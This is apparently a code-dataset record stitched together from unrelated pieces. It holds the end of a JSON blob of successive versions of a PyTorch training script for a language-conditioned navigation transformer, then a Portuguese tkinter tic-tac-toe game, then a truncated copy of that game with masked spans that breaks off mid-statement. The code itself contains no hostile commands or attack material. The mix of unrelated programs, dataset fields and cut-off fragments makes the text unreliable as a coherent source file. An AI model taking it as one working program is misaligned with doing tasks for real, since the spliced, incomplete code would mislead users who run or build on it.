locality_mask=args.locality_mask,\n locality_neighborhood=args.locality_neighborhood, init_scale=args.\n init_scale)\n encoder = encoder_cls(**encoder_kwargs)\n if args.cuda is not None:\n encoder = encoder.cuda(device)\n print(encoder)\n optimizer = torch.optim.Adam(encoder.parameters(), lr=args.learn_rate)\n scheduler = NoamLR(optimizer, model_size=args.hidden_dim, warmup_steps=\n args.warmup, factor=args.lr_factor)\n best_epoch = -1\n block_size = int(args.resolution * 4 / 64)\n if not args.test:\n if not args.resume:\n try:\n os.mkdir(args.checkpoint_dir)\n except FileExistsError:\n try:\n assert len(glob.glob(os.path.join(args.checkpoint_dir,\n '*.th'))) == 0\n except AssertionError:\n raise AssertionError(\n f'Output directory {args.checkpoint_dir} non-empty, will not overwrite!'\n )\n else:\n encoder = encoder.to('cpu')\n state_dict = torch.load(pathlib.Path(args.checkpoint_dir).\n joinpath('best.th'), map_location='cpu')\n encoder.load_state_dict(state_dict, strict=True)\n encoder = encoder.cuda(device)\n best_checkpoint_data = json.load(open(pathlib.Path(args.\n checkpoint_dir).joinpath('best_training_state.json')))\n print(f'best_checkpoint_data {best_checkpoint_data}')\n best_epoch = best_checkpoint_data['epoch']\n with open(pathlib.Path(args.checkpoint_dir).joinpath('config.yaml'),\n 'w') as f1:\n dump_args = copy.deepcopy(args)\n del dump_args.__dict__['cfg']\n del dump_args.__dict__['__cwd__']\n del dump_args.__dict__['__path__']\n to_dump = dump_args.__dict__\n yaml.safe_dump(to_dump, f1, encoding='utf-8', allow_unicode=True)\n else:\n print(f'loading model weights from {args.checkpoint_dir}')\n encoder = encoder.to('cpu')\n state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath(\n 'best.th'), map_location='cpu')\n encoder.load_state_dict(state_dict, strict=True)\n encoder = encoder.cuda(device)\n num_blocks = 1\n trainer = NavigationTransformerTrainer(dataset_reader=dataset_reader,\n encoder=encoder, optimizer=optimizer, scheduler=scheduler,\n num_epochs=args.num_epochs, num_blocks=num_blocks, device=device,\n checkpoint_dir=args.checkpoint_dir, checkpoint_every=args.\n checkpoint_every, validation_limit=args.validation_limit,\n num_models_to_keep=args.num_models_to_keep, generate_after_n=args.\n generate_after_n, score_type=args.score_type, depth=depth,\n resolution=args.resolution, output_type=args.output_type,\n patch_size=args.patch_size, block_size=block_size, best_epoch=\n best_epoch, seed=args.seed, zero_weight=args.zero_weight,\n debug_image_top_k=args.debug_image_top_k, debug_image_threshold=\n args.debug_image_threshold)\n if not args.test:\n trainer.train()\n else:\n print(f'evaluating')\n acc = trainer.evaluate()\n print(f'accuracy: {acc}')\n\n\nif __name__ == '__main__':\n np.random.seed(12)\n torch.manual_seed(12)\n parser = configure_parser()\n args = parser.parse_args()\n main(args)\n",
"step-5": "import json \nfrom jsonargparse import ArgumentParser, ActionConfigFile \nimport yaml \nfrom typing import List, Dict\nimport glob\nimport os \nimport pathlib\nimport pdb \nimport subprocess \nimport copy \nfrom io import StringIO\nfrom collections import defaultdict\n\nimport torch\nfrom spacy.tokenizer import Tokenizer\nfrom spacy.lang.en import English\nfrom einops import rearrange \nimport logging \nfrom tqdm import tqdm \nimport matplotlib\nfrom matplotlib import pyplot as plt\nimport matplotlib.patches as patches\nfrom matplotlib import gridspec\nimport numpy as np\nimport torch.autograd.profiler as profiler\nfrom torch.nn import functional as F\nfrom torch.optim.lr_scheduler import StepLR\nfrom allennlp.training.scheduler import Scheduler \nfrom allennlp.training.learning_rate_schedulers import NoamLR\nimport pandas as pd \n\nfrom transformer import TransformerEncoder, ResidualTransformerEncoder, image_to_tiles, tiles_to_image\nfrom metrics import MSEMetric, AccuracyMetric, F1Metric\nfrom language_embedders import RandomEmbedder, GloveEmbedder, BERTEmbedder\nfrom navigation_data import NavigationDatasetReader, NavigationImageTrajectory, configure_parser\nfrom train_language_encoder import get_free_gpu, load_data, get_vocab, LanguageTrainer, FlatLanguageTrainer\nfrom navigation_transformer import NavigationTransformerEncoder\nfrom train_transformer import TransformerTrainer\n\nlogger = logging.getLogger(__name__)\n\nclass NavigationTransformerTrainer(TransformerTrainer): \n def __init__(self,\n dataset_reader: NavigationDatasetReader,\n encoder: TransformerEncoder,\n optimizer: torch.optim.Optimizer,\n scheduler: Scheduler, \n num_epochs: int,\n num_blocks: int, \n device: torch.device,\n checkpoint_dir: str,\n num_models_to_keep: int,\n generate_after_n: int,\n resolution: int = 64, \n patch_size: int = 8,\n block_size: int = 4, \n batch_size: int = 16, \n output_type: str = \"per-pixel\", \n checkpoint_every: int = 64,\n validation_limit: int = 16, \n depth: int = 7,\n score_type: str = \"acc\",\n best_epoch: int = -1,\n seed: int = 12, \n zero_weight: float = 0.05,\n debug_image_top_k: int = None,\n debug_image_threshold: float = None):\n super(NavigationTransformerTrainer, self).__init__(train_data=[],\n val_data=[],\n encoder=encoder,\n optimizer=optimizer,\n scheduler=scheduler,\n num_epochs=num_epochs,\n num_blocks=num_blocks,\n device=device,\n checkpoint_dir=checkpoint_dir,\n num_models_to_keep=num_models_to_keep,\n generate_after_n=generate_after_n,\n score_type=score_type,\n patch_size=patch_size,\n block_size=block_size,\n output_type=output_type,\n resolution=resolution, \n depth=depth, \n best_epoch=best_epoch,\n seed=seed,\n zero_weight=zero_weight) \n self.f1_metric = F1Metric() \n self.dataset_reader = dataset_reader\n self.batch_size = batch_size \n self.checkpoint_every = checkpoint_every\n self.validation_limit = validation_limit\n if debug_image_top_k < 0:\n debug_image_top_k = None\n if debug_image_threshold < 0:\n debug_image_threshold = None\n self.debug_image_top_k = debug_image_top_k\n self.debug_image_threshold = debug_image_threshold\n\n def split_large_batch(self, batch):\n large_bsz = batch['path_state'].shape[0]\n small_batches = []\n for i in range(0, large_bsz, self.batch_size):\n small_batch = {} \n for k in batch.keys():\n small_batch[k] = batch[k][i:i+self.batch_size]\n small_batches.append(small_batch)\n return small_batches\n\n def validate_one_epoch(self, epoch, step, validation_limit):\n print(f\"Validating epoch {epoch} step 
{step}...\") \n total_prev_acc, total_next_acc = 0.0, 0.0\n total = 0 \n self.encoder.eval() \n for b, dev_batch_instance in enumerate(self.dataset_reader.read(\"dev\", validation_limit)): \n actual_batches = self.split_large_batch(dev_batch_instance)\n for small_batch in actual_batches:\n score_dict = self.validate(small_batch, epoch, b, 0) \n total_next_acc += score_dict['next_f1']\n total += 1\n\n mean_next_acc = total_next_acc / total \n return mean_next_acc\n\n def evaluate(self):\n total_acc = 0.0 \n total = 0 \n total_block_acc = 0.0 \n self.encoder.eval() \n for b, dev_batch_instance in tqdm(enumerate(self.dataset_reader.read(\"dev\", self.validation_limit))): \n actual_batches = self.split_large_batch(dev_batch_instance)\n for small_batch in actual_batches:\n score_dict = self.validate(small_batch, 10, b, 0, self.debug_image_top_k, self.debug_image_threshold) \n total_acc += score_dict['next_f1']\n total += 1\n\n mean_acc = total_acc / total \n print(f\"Test-time pixel acc {mean_acc * 100}\") \n return mean_acc \n\n def train_and_validate_one_epoch(self, epoch): \n print(f\"Training epoch {epoch}...\") \n self.encoder.train() \n skipped = 0\n step = 0\n for b, batch_instance in enumerate(self.dataset_reader.read(\"train\")): \n actual_batches = self.split_large_batch(batch_instance)\n for sb, small_batch in enumerate(actual_batches):\n is_best = False\n self.optimizer.zero_grad() \n outputs = self.encoder(small_batch) \n # skip bad examples \n if outputs is None:\n skipped += 1\n continue\n\n loss = self.compute_patch_loss(small_batch, outputs, self.next_to_prev_weight) \n loss.backward() \n self.optimizer.step() \n it = (epoch + 1) * (step+1) \n self.scheduler.step_batch(it) \n #print(f\"step: {step+1} checkpoint_every: {self.checkpoint_every} {(step +1) % self.checkpoint_every}\")\n if (step+1) % self.checkpoint_every == 0:\n step_acc = self.validate_one_epoch(epoch, step, self.validation_limit)\n print(f\"Epoch {epoch} step {step} has next pixel F1 {step_acc * 100:.2f}\")\n if step_acc > self.best_score:\n is_best = True\n self.best_score = step_acc\n\n self.save_model(f\"{epoch}_{step}\", is_best) \n\n step += 1\n print(f\"skipped {skipped} examples\") \n epoch_acc = self.validate_one_epoch(epoch, step, 10 * self.validation_limit) \n print(f\"Epoch {epoch} has next pixel F1 {epoch_acc * 100:.2f}\") \n if self.score_type == \"acc\":\n return (epoch_acc)/2, -1.0\n else:\n raise AssertionError(f\"invalid score type {self.score_type}\")\n\n def compute_patch_loss(self, inputs, outputs, next_to_prev_weight = [1.0, 1.0]):\n \"\"\"\n compute per-patch for each patch \n \"\"\"\n bsz, w, h, __ = inputs['input_image'].shape \n\n pred_next_image = outputs[\"next_position\"]\n\n path_state = inputs['path_state'].reshape(bsz, 1, w, h).float() \n true_next_image = image_to_tiles(path_state, self.patch_size) \n\n # binarize patches\n next_sum_image = torch.sum(true_next_image, dim = 2, keepdim=True) \n next_patches = torch.zeros_like(next_sum_image)\n # any patch that has a 1 pixel in it gets 1 \n next_patches[next_sum_image != 0] = 1\n\n pred_next_image = pred_next_image.squeeze(-1)\n next_patches = next_patches.squeeze(-1).to(self.device).long() \n\n pred_next_image = rearrange(pred_next_image, 'b n c -> b c n')\n\n next_pixel_loss = self.weighted_xent_loss_fxn(pred_next_image, next_patches) \n\n total_loss = next_pixel_loss \n print(f\"loss {total_loss.item()}\")\n\n return total_loss\n\n def generate_debugging_image(self, \n true_img, \n path_state, \n pred_path, \n out_path, \n caption 
= None,\n top_k = None,\n threshold = None): \n caption = self.wrap_caption(caption)\n\n fig, ax = plt.subplots(2,2, figsize=(16,16))\n\n # gs = gridspec.GridSpec(2, 2, width_ratios=[2, 1])\n text_ax = ax[0,1]\n text_ax.axis([0, 1, 0, 1])\n text_ax.text(0.2, 0.02, caption, fontsize = 12)\n text_ax.axis(\"off\") \n\n props = dict(boxstyle='round', \n facecolor='wheat', alpha=0.5)\n text_ax.text(0.05, 0.95, caption, wrap=True, fontsize=14,\n verticalalignment='top', bbox=props)\n # img_ax = plt.subplot(gs[2])\n img_ax = ax[1,0]\n #w = int(40 * (self.resolution / 224))\n true_img = true_img.detach().cpu().numpy().astype(float)[:,:,0:3]\n img_ax.imshow(true_img)\n\n true_path = path_state.detach().numpy()\n true_path = np.tile(true_path.reshape(512, 512, 1), (1,1,3)).astype(float)\n\n true_ax = ax[0,0]\n true_ax.imshow(true_path)\n\n pred_path = torch.softmax(pred_path, dim=0)\n pred_path = pred_path[1,:,:]\n\n\n pred_path = pred_path.cpu().detach().numpy().reshape(512, 512, 1)\n\n if top_k is not None:\n top_k_inds = np.argpartition(pred_path, -top_k, axis=None)[-top_k:]\n top_k_inds = np.unravel_index(top_k_inds, shape = (512, 512))\n pred_path[top_k_inds] = 1.1\n pred_path[pred_path<1.0] = 0\n pred_path[top_k_inds] = 1.0\n elif threshold is not None:\n pred_path[pred_path < threshold] = 0\n else:\n pred_path = pred_path \n\n\n pred_path = np.tile(pred_path, (1,1,3)).astype(float)\n\n pred_ax = ax[1,1]\n pred_ax.imshow(pred_path)\n\n file_path = f\"{out_path}.png\"\n print(f\"saving to {file_path}\") \n plt.savefig(file_path) \n plt.close() \n\n def validate(self, batch_instance, epoch_num, batch_num, instance_num, top_k, threshold): \n self.encoder.eval() \n outputs = self.encoder(batch_instance) \n next_position = outputs['next_position']\n\n next_position = tiles_to_image(next_position, self.patch_size, output_type=\"per-patch\", upsample=True) \n # f1 metric \n next_p, next_r, next_f1 = self.f1_metric.compute_f1(batch_instance[\"path_state\"].unsqueeze(-1), next_position) \n\n if epoch_num > self.generate_after_n: \n for i in range(outputs[\"next_position\"].shape[0]):\n output_path = self.checkpoint_dir.joinpath(f\"batch_{batch_num}\").joinpath(f\"instance_{i}\")\n output_path.mkdir(parents = True, exist_ok=True)\n command = batch_instance[\"command\"][i]\n command = [x for x in command if x != \"<PAD>\"]\n command = \" \".join(command) \n image = batch_instance['input_image'][i]\n path_state = batch_instance[\"path_state\"][i]\n pred_path = next_position[i]\n self.generate_debugging_image(image,\n path_state,\n pred_path,\n output_path,\n caption = command,\n top_k = top_k,\n threshold = threshold)\n\n return {\"next_f1\": next_f1} \n\n def compute_f1(self, true_pos, pred_pos):\n eps = 1e-8\n values, pred_pixels = torch.max(pred_pos, dim=1) \n gold_pixels = true_pos \n pred_pixels = pred_pixels.unsqueeze(1) \n\n pred_pixels = pred_pixels.detach().cpu().float() \n gold_pixels = gold_pixels.detach().cpu().float() \n\n total_pixels = sum(pred_pixels.shape) \n\n true_pos = torch.sum(pred_pixels * gold_pixels).item() \n true_neg = torch.sum((1-pred_pixels) * (1 - gold_pixels)).item() \n false_pos = torch.sum(pred_pixels * (1 - gold_pixels)).item() \n false_neg = torch.sum((1-pred_pixels) * gold_pixels).item() \n precision = true_pos / (true_pos + false_pos + eps) \n recall = true_pos / (true_pos + false_neg + eps) \n f1 = 2 * (precision * recall) / (precision + recall + eps) \n return precision, recall, f1\n\ndef main(args):\n device = \"cpu\"\n if args.cuda is not None:\n free_gpu_id = 
get_free_gpu()\n if free_gpu_id > -1:\n device = f\"cuda:{free_gpu_id}\"\n #device = \"cuda:0\"\n\n device = torch.device(device) \n print(f\"On device {device}\") \n #test = torch.ones((1))\n #test = test.to(device) \n\n nlp = English()\n tokenizer = Tokenizer(nlp.vocab)\n\n dataset_reader = NavigationDatasetReader(dir = args.data_dir,\n out_path = args.out_path,\n path_width = args.path_width,\n read_limit = args.read_limit, \n batch_size = args.batch_size, \n max_len = args.max_len,\n tokenizer = tokenizer,\n shuffle = args.shuffle,\n overfit = args.overfit, \n is_bert = \"bert\" in args.embedder) \n\n checkpoint_dir = pathlib.Path(args.checkpoint_dir)\n if not checkpoint_dir.exists():\n checkpoint_dir.mkdir() \n\n if not args.test:\n with open(dataset_reader.path_dict['train'].joinpath(\"vocab.json\")) as f1:\n train_vocab = json.load(f1)\n with open(checkpoint_dir.joinpath(\"vocab.json\"), \"w\") as f1:\n json.dump(list(train_vocab), f1) \n else:\n print(f\"Reading vocab from {checkpoint_dir}\") \n with open(checkpoint_dir.joinpath(\"vocab.json\")) as f1:\n train_vocab = json.load(f1) \n\n print(f\"got data\") \n\n # construct the vocab and tokenizer \n print(f\"constructing model...\") \n # get the embedder from args \n if args.embedder == \"random\":\n embedder = RandomEmbedder(tokenizer, train_vocab, args.embedding_dim, trainable=True)\n elif args.embedder == \"glove\":\n embedder = GloveEmbedder(tokenizer, train_vocab, args.embedding_file, args.embedding_dim, trainable=True) \n elif args.embedder.startswith(\"bert\"): \n embedder = BERTEmbedder(model_name = args.embedder, max_seq_len = args.max_len) \n else:\n raise NotImplementedError(f\"No embedder {args.embedder}\") \n\n depth = 1\n encoder_cls = NavigationTransformerEncoder\n \n encoder_kwargs = dict(image_size = args.resolution,\n patch_size = args.patch_size, \n language_embedder = embedder, \n n_layers = args.n_layers,\n channels = args.channels,\n n_heads = args.n_heads,\n hidden_dim = args.hidden_dim,\n ff_dim = args.ff_dim,\n dropout = args.dropout,\n embed_dropout = args.embed_dropout,\n output_type = args.output_type, \n positional_encoding_type = args.pos_encoding_type,\n device = device,\n log_weights = args.test,\n locality_mask = args.locality_mask,\n locality_neighborhood = args.locality_neighborhood,\n init_scale = args.init_scale) \n\n # Initialize encoder \n encoder = encoder_cls(**encoder_kwargs)\n\n if args.cuda is not None:\n encoder = encoder.cuda(device) \n print(encoder) \n # construct optimizer \n optimizer = torch.optim.Adam(encoder.parameters(), lr=args.learn_rate) \n # scheduler\n scheduler = NoamLR(optimizer, model_size = args.hidden_dim, warmup_steps = args.warmup, factor = args.lr_factor) \n\n best_epoch = -1\n block_size = int((args.resolution * 4)/64) \n if not args.test:\n if not args.resume:\n try:\n os.mkdir(args.checkpoint_dir)\n except FileExistsError:\n # file exists\n try:\n assert(len(glob.glob(os.path.join(args.checkpoint_dir, \"*.th\"))) == 0)\n except AssertionError:\n raise AssertionError(f\"Output directory {args.checkpoint_dir} non-empty, will not overwrite!\") \n else:\n # resume from pre-trained \n encoder = encoder.to(\"cpu\") \n state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath(\"best.th\"), map_location='cpu')\n \n encoder.load_state_dict(state_dict, strict=True) \n encoder = encoder.cuda(device) \n # get training info \n best_checkpoint_data = json.load(open(pathlib.Path(args.checkpoint_dir).joinpath(\"best_training_state.json\")))\n 
print(f\"best_checkpoint_data {best_checkpoint_data}\") \n best_epoch = best_checkpoint_data[\"epoch\"]\n\n # save arg config to checkpoint_dir\n with open(pathlib.Path(args.checkpoint_dir).joinpath(\"config.yaml\"), \"w\") as f1:\n dump_args = copy.deepcopy(args) \n # drop stuff we can't serialize \n del(dump_args.__dict__[\"cfg\"]) \n del(dump_args.__dict__[\"__cwd__\"]) \n del(dump_args.__dict__[\"__path__\"]) \n to_dump = dump_args.__dict__\n # dump \n yaml.safe_dump(to_dump, f1, encoding='utf-8', allow_unicode=True) \n\n else:\n # test-time, load best model \n print(f\"loading model weights from {args.checkpoint_dir}\") \n #state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath(\"best.th\"))\n #encoder.load_state_dict(state_dict, strict=True) \n encoder = encoder.to(\"cpu\") \n state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath(\"best.th\"), map_location='cpu')\n \n encoder.load_state_dict(state_dict, strict=True) \n encoder = encoder.cuda(device) \n\n num_blocks = 1\n # construct trainer \n trainer = NavigationTransformerTrainer(dataset_reader = dataset_reader,\n encoder = encoder,\n optimizer = optimizer, \n scheduler = scheduler, \n num_epochs = args.num_epochs,\n num_blocks = num_blocks,\n device = device,\n checkpoint_dir = args.checkpoint_dir,\n checkpoint_every = args.checkpoint_every, \n validation_limit = args.validation_limit, \n num_models_to_keep = args.num_models_to_keep,\n generate_after_n = args.generate_after_n, \n score_type=args.score_type,\n depth = depth, \n resolution = args.resolution, \n output_type = args.output_type, \n patch_size = args.patch_size,\n block_size = block_size, \n best_epoch = best_epoch,\n seed = args.seed,\n zero_weight = args.zero_weight,\n debug_image_top_k = args.debug_image_top_k,\n debug_image_threshold = args.debug_image_threshold) \n\n if not args.test:\n trainer.train() \n else:\n print(f\"evaluating\") \n acc = trainer.evaluate()\n print(f\"accuracy: {acc}\")\n\n\nif __name__ == \"__main__\":\n np.random.seed(12)\n torch.manual_seed(12)\n\n parser = configure_parser()\n args = parser.parse_args() \n\n main(args) \n\n",
"step-ids": [
10,
11,
12,
13,
15
]
}
|
[
10,
11,
12,
13,
15
] |
import tkinter as tk
import classejogo
class Tabuleiro():
def __init__(self):
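        # Game logic (current player, winner, win counters, move handling) is provided by the external classejogo module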
self.jogo = classejogo.Jogo()
self.window = tk.Tk()
self.window.title("Jogo da Velha")
self.window.geometry("300x360+100+100")
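        # 5-row grid: row 0 holds the score bar, rows 1-3 hold the 3x3 board, row 4 holds the turn/restart/winner bar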
self.window.rowconfigure(0, minsize=30, weight=1)
self.window.rowconfigure(1, minsize=100, weight=1)
self.window.rowconfigure(2, minsize=100, weight=1)
self.window.rowconfigure(3, minsize=100, weight=1)
self.window.rowconfigure(4, minsize=30, weight=1)
self.window.columnconfigure(0, minsize=100, weight=1)
self.window.columnconfigure(1, minsize=100, weight=1)
self.window.columnconfigure(2, minsize=100, weight=1)
self.window.columnconfigure(3, minsize=100, weight=1)
        # Creating the board buttons:
self.vitorias_X = tk.Label(self.window)
self.vitorias_X.grid(row=0, column=0, sticky="nsew")
self.vitorias_X.configure(text="Vitórias de X: {0} ".format(self.jogo.vitórias_x),font='Arial 10', bg='Blue', fg='White')
self.placar = tk.Label(self.window)
self.placar.grid(row=0, column=1, sticky="nsew")
self.placar.configure(text= "<- PLACAR ->",font='Arial 10', bg='Black', fg='Green')
self.vitorias_O = tk.Label(self.window)
self.vitorias_O.grid(row=0, column=2, sticky="nsew")
self.vitorias_O.configure(text="Vitórias de O: {0} ".format(self.jogo.vitórias_o), font='Arial 10', bg='Yellow', fg='Black')
self.botão0x0 = tk.Button(self.window)
self.botão0x0.grid(row=1, column=0, sticky="nsew")
self.botão0x0.configure(command=self.botão0x0_clicado)
self.botão0x1 = tk.Button(self.window)
self.botão0x1.grid(row=1, column=1, sticky="nsew")
self.botão0x1.configure(command=self.botão0x1_clicado)
self.botão0x2 = tk.Button(self.window)
self.botão0x2.grid(row=1, column=2, sticky="nsew")
self.botão0x2.configure(command=self.botão0x2_clicado)
self.botão1x0 = tk.Button(self.window)
self.botão1x0.grid(row=2, column=0, sticky="nsew")
self.botão1x0.configure(command=self.botão1x0_clicado)
self.botão1x1 = tk.Button(self.window)
self.botão1x1.grid(row=2, column=1, sticky="nsew")
self.botão1x1.configure(command=self.botão1x1_clicado)
self.botão1x2 = tk.Button(self.window)
self.botão1x2.grid(row=2, column=2, sticky="nsew")
self.botão1x2.configure(command=self.botão1x2_clicado)
self.botão2x0 = tk.Button(self.window)
self.botão2x0.grid(row=3, column=0, sticky="nsew")
self.botão2x0.configure(command=self.botão2x0_clicado)
self.botão2x1 = tk.Button(self.window)
self.botão2x1.grid(row=3, column=1, sticky="nsew")
self.botão2x1.configure(command=self.botão2x1_clicado)
self.botão2x2 = tk.Button(self.window)
self.botão2x2.grid(row=3, column=2, sticky="nsew")
self.botão2x2.configure(command=self.botão2x2_clicado)
        # Creating the turn label:
self.label_turno = tk.Label(self.window)
self.label_turno.grid(row=4, column=0, columnspan=1, sticky="nsew")
self.label_turno.configure(text="Turno de : {0}" .format(self.jogo.player), bg='Black', fg='Green',font='Arial 9',)
        # Creating the restart button:
self.reiniciar = tk.Button(self.window)
self.reiniciar.grid(row=4, column=1,columnspan=1, sticky="nsew")
self.reiniciar.configure(text="Reiniciar", font='Arial 18', activeforeground='Green', fg='Red', command=self.restart)
self.label_ganhador = tk.Label(self.window)
self.label_ganhador.grid(row=4, column=2, columnspan=1, sticky="nsew")
self.label_ganhador.configure(text="Ganhador: {0}" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)
###############################################################################
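    # Debug helper: logs the current player and the coordinates of the clicked cell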
def clicou(self, i, j):
print("Turno de: {0} " .format(self.jogo.player))
print("Botão {0} x {1} clicado" .format(i,j))
###############################################################################
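    # One callback per board cell: mark the button with the current player, register the move, then refresh the turn and winner labels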
def botão0x0_clicado(self):
self.clicou(0,0)
self.botão0x0.configure(text=self.jogo.player, state= "disabled", font='Arial 100 ')
self.jogo.recebe_jogada(0,0)
self.label_turno.configure(text="Turno de: {0}" .format(self.jogo.player))
self.label_ganhador.configure(text="Ganhador: {0}" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)
def botão0x1_clicado(self):
self.clicou(0,1)
self.botão0x1.configure(text=self.jogo.player, state= "disabled", font='Arial 100 ')
self.jogo.recebe_jogada(0,1)
self.label_turno.configure(text="Turno de: {0}" .format(self.jogo.player))
self.label_ganhador.configure(text="Ganhador: {0}" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)
def botão0x2_clicado(self):
self.clicou(0,2)
self.botão0x2.configure(text=self.jogo.player, state= "disabled", font='Arial 100 ')
self.jogo.recebe_jogada(0,2)
self.label_turno.configure(text="Turno de: {0}" .format(self.jogo.player))
self.label_ganhador.configure(text="Ganhador: {0}" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)
def botão1x0_clicado(self):
self.clicou(1,0)
self.botão1x0.configure(text=self.jogo.player, state= "disabled", font='Arial 100 ')
self.jogo.recebe_jogada(1,0)
self.label_turno.configure(text="Turno de: {0}" .format(self.jogo.player))
self.label_ganhador.configure(text="Ganhador: {0}" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)
def botão1x1_clicado(self):
self.clicou(1,1)
self.botão1x1.configure(text=self.jogo.player, state= "disabled", font='Arial 100 ')
self.jogo.recebe_jogada(1,1)
self.label_turno.configure(text="Turno de: {0}" .format(self.jogo.player))
self.label_ganhador.configure(text="Ganhador: {0}" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)
def botão1x2_clicado(self):
self.clicou(1,2)
self.botão1x2.configure(text=self.jogo.player, state= "disabled", font='Arial 100 ')
self.jogo.recebe_jogada(1,2)
self.label_turno.configure(text="Turno de: {0}" .format(self.jogo.player))
self.label_ganhador.configure(text="Ganhador: {0}" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)
def botão2x0_clicado(self):
self.clicou(2,0)
self.botão2x0.configure(text=self.jogo.player, state= "disabled", font='Arial 100 ')
self.jogo.recebe_jogada(2,0)
self.label_turno.configure(text="Turno de: {0}" .format(self.jogo.player))
self.label_ganhador.configure(text="Ganhador: {0}" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)
def botão2x1_clicado(self):
self.clicou(2,1)
self.botão2x1.configure(text=self.jogo.player, state= "disabled", font='Arial 100 ')
self.jogo.recebe_jogada(2,1)
self.label_turno.configure(text="Turno de: {0}" .format(self.jogo.player))
self.label_ganhador.configure(text="Ganhador: {0}" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)
def botão2x2_clicado(self):
self.clicou(2,2)
self.botão2x2.configure(text=self.jogo.player, state= "disabled", font='Arial 100 ')
self.jogo.recebe_jogada(2,2)
self.label_turno.configure(text="Turno de: {0}" .format(self.jogo.player))
self.label_ganhador.configure(text="Ganhador: {0}" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)
def iniciar(self):
self.window.mainloop()
###############################################################################
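    # Clears the stored moves, recreates the nine board buttons and status widgets, and refreshes the score labels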
def restart(self):
self.jogo.limpa_jogadas()
self.botão0x0 = tk.Button(self.window)
self.botão0x0.grid(row=1, column=0, sticky="nsew")
self.botão0x0.configure(command=self.botão0x0_clicado)
self.botão0x1 = tk.Button(self.window)
self.botão0x1.grid(row=1, column=1, sticky="nsew")
self.botão0x1.configure(command=self.botão0x1_clicado)
self.botão0x2 = tk.Button(self.window)
self.botão0x2.grid(row=1, column=2, sticky="nsew")
self.botão0x2.configure(command=self.botão0x2_clicado)
self.botão1x0 = tk.Button(self.window)
self.botão1x0.grid(row=2, column=0, sticky="nsew")
self.botão1x0.configure(command=self.botão1x0_clicado)
self.botão1x1 = tk.Button(self.window)
self.botão1x1.grid(row=2, column=1, sticky="nsew")
self.botão1x1.configure(command=self.botão1x1_clicado)
self.botão1x2 = tk.Button(self.window)
self.botão1x2.grid(row=2, column=2, sticky="nsew")
self.botão1x2.configure(command=self.botão1x2_clicado)
self.botão2x0 = tk.Button(self.window)
self.botão2x0.grid(row=3, column=0, sticky="nsew")
self.botão2x0.configure(command=self.botão2x0_clicado)
self.botão2x1 = tk.Button(self.window)
self.botão2x1.grid(row=3, column=1, sticky="nsew")
self.botão2x1.configure(command=self.botão2x1_clicado)
self.botão2x2 = tk.Button(self.window)
self.botão2x2.grid(row=3, column=2, sticky="nsew")
self.botão2x2.configure(command=self.botão2x2_clicado)
        # Creating the turn label:
self.label_turno = tk.Label(self.window)
self.label_turno.grid(row=4, column=0, columnspan=1, sticky="nsew")
self.label_turno.configure(text="Turno de : {0}" .format(self.jogo.player), bg='Black', fg='Green',font='Arial 9',)
        # Creating the restart button:
self.reiniciar = tk.Button(self.window)
self.reiniciar.grid(row=4, column=1,columnspan=1, sticky="nsew")
self.reiniciar.configure(text="Reiniciar", font='Arial 24', activeforeground='Green', fg='Red', command=self.restart)
self.label_ganhador = tk.Label(self.window)
self.label_ganhador.grid(row=4, column=2, columnspan=1, sticky="nsew")
self.label_ganhador.configure(text="Ganhador: {0}" .format(self.jogo.ganhador), bg='Black', fg='Green',font='Arial 9',)
self.vitorias_X.configure(text="Vitórias de X: {0} ".format(self.jogo.vitórias_x), bg='Blue', fg='White')
self.vitorias_O.configure(text="Vitórias de O: {0} ".format(self.jogo.vitórias_o), bg='Yellow', fg='Black')
###############################################################################
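# Build the board and start the Tk event loop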
jogodavelha = Tabuleiro()
jogodavelha.iniciar()
|
normal
|
{
"blob_id": "9cff227eeeaffda777668aa3b90e3839426da811",
"index": 6683,
"step-1": "<mask token>\n\n\nclass Tabuleiro:\n\n def __init__(self):\n self.jogo = classejogo.Jogo()\n self.window = tk.Tk()\n self.window.title('Jogo da Velha')\n self.window.geometry('300x360+100+100')\n self.window.rowconfigure(0, minsize=30, weight=1)\n self.window.rowconfigure(1, minsize=100, weight=1)\n self.window.rowconfigure(2, minsize=100, weight=1)\n self.window.rowconfigure(3, minsize=100, weight=1)\n self.window.rowconfigure(4, minsize=30, weight=1)\n self.window.columnconfigure(0, minsize=100, weight=1)\n self.window.columnconfigure(1, minsize=100, weight=1)\n self.window.columnconfigure(2, minsize=100, weight=1)\n self.window.columnconfigure(3, minsize=100, weight=1)\n self.vitorias_X = tk.Label(self.window)\n self.vitorias_X.grid(row=0, column=0, sticky='nsew')\n self.vitorias_X.configure(text='Vitórias de X: {0} '.format(self.\n jogo.vitórias_x), font='Arial 10', bg='Blue', fg='White')\n self.placar = tk.Label(self.window)\n self.placar.grid(row=0, column=1, sticky='nsew')\n self.placar.configure(text='<- PLACAR ->', font='Arial 10', bg=\n 'Black', fg='Green')\n self.vitorias_O = tk.Label(self.window)\n self.vitorias_O.grid(row=0, column=2, sticky='nsew')\n self.vitorias_O.configure(text='Vitórias de O: {0} '.format(self.\n jogo.vitórias_o), font='Arial 10', bg='Yellow', fg='Black')\n self.botão0x0 = tk.Button(self.window)\n self.botão0x0.grid(row=1, column=0, sticky='nsew')\n self.botão0x0.configure(command=self.botão0x0_clicado)\n self.botão0x1 = tk.Button(self.window)\n self.botão0x1.grid(row=1, column=1, sticky='nsew')\n self.botão0x1.configure(command=self.botão0x1_clicado)\n self.botão0x2 = tk.Button(self.window)\n self.botão0x2.grid(row=1, column=2, sticky='nsew')\n self.botão0x2.configure(command=self.botão0x2_clicado)\n self.botão1x0 = tk.Button(self.window)\n self.botão1x0.grid(row=2, column=0, sticky='nsew')\n self.botão1x0.configure(command=self.botão1x0_clicado)\n self.botão1x1 = tk.Button(self.window)\n 